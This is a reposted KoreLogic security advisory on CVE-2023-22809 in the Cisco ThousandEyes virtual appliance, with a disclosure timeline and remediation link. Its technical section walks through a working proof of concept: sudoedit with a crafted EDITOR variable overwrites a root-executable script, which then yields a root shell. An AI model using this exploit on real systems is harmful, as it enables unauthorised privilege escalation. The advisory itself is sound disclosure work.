Share
## https://sploitus.com/exploit?id=1337DAY-ID-38980
Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit
Advisory ID: KL-001-2023-003
Publication Date: 2023.08.17
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt


1. Vulnerability Details

      Affected Vendor: ThousandEyes
      Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
      Affected Version: thousandeyes-va-64-18.04 0.218
      Platform: Linux / Ubuntu 18.04
      CWE Classification: CWE-1395: Dependency on Vulnerable
                          Third-Party Component
      CVE ID: CVE-2023-22809


2. Vulnerability Description

      An unpatched vulnerability in 'sudoedit', allowed by sudo
      configuration, permits a low-privilege user to modify arbitrary
      files as root and subsequently execute arbitrary commands as
      root.


3. Technical Description

    The ThousandEyes Virtual Appliance is distributed with
    a restrictive set of commands that can be executed via
    sudo, without having to provide the password for the
    'thousandeyes' account. However, the ability to execute
    sudoedit of a specific file (/etc/hosts) via sudo is permitted
    without requiring the password. The sudoedit binary can
    be abused to allow the modification of any file on the
    filesystem. This is a known security vulnerability (per
    https://seclists.org/oss-sec/2023/q1/42), but had not been
    disclosed for the ThousandEyes Virtual Appliance. This can be
    abused to allow root-level compromise of the virtual appliance.

      thousandeyes@thousandeyes-va:~$ id
      uid=1000(thousandeyes) gid=1000(thousandeyes) 
groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
      thousandeyes@thousandeyes-va:~$ sudo -l
      Matching Defaults entries for thousandeyes on thousandeyes-va:
          env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

      User thousandeyes may run the following commands on thousandeyes-va:
          (ALL : ALL) ALL
          (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, 
/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop
              te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start 
te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart
              te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, 
/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,
              /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, 
/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install
              te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, 
/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
          (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump

    Here we see that /usr/local/bin/te-* are executable as root with no
    password. Even though sudoedit is only permitted to edit /etc/hosts,
    we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one
    of those scripts because we can then execute it:

      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
      /usr/local/bin/te-set-config: Python script, ASCII text executable
      thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts
      sudoedit: --: editing files in a writable directory is not permitted
      2 files to edit
      sudoedit: /etc/hosts unchanged
      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
      /usr/local/bin/te-set-config: ASCII text
      thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config
      /bin/bash
      thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config
      root@thousandeyes-va:~# id
      uid=0(root) gid=0(root) groups=0(root)
      root@thousandeyes-va:~#


4. Mitigation and Remediation Recommendation

      The vendor has released a version which remediates the described
      vulnerability. Release notes are available at:

      https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994


5. Credit

      This vulnerability was discovered by Jim Becher of
      KoreLogic, Inc.


6. Disclosure Timeline

      2023.04.26 - KoreLogic submits vulnerability details to Cisco.
      2023.04.26 - Cisco acknowledges receipt and the intention to
                   investigate.
      2023.05.04 - Cisco notifies KoreLogic that a remediation for this
                   vulnerability is expected to be available within
                   90 days.
      2023.06.30 - 45 business days have elapsed since KoreLogic reported
                   this vulnerability to the vendor.
      2023.07.11 - Cisco informs KoreLogic that the issue has been
                   remediated in the latest ThousandEyes Virtual
                   Appliance and a Third Party Software Release Note
                   Enclosure will be released 2023.08.16. Cisco
                   provides CVE-2023-22809 to track this vulnerability.
      2023.07.24 - 60 business days have elapsed since KoreLogic reported
                   this vulnerability to the vendor.
      2023.08.16 - Cisco public acknowledgement.
      2023.08.17 - KoreLogic public disclosure.


7. Proof of Concept

      See 3. Technical Description.


The contents of this advisory are copyright(c) 2023
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/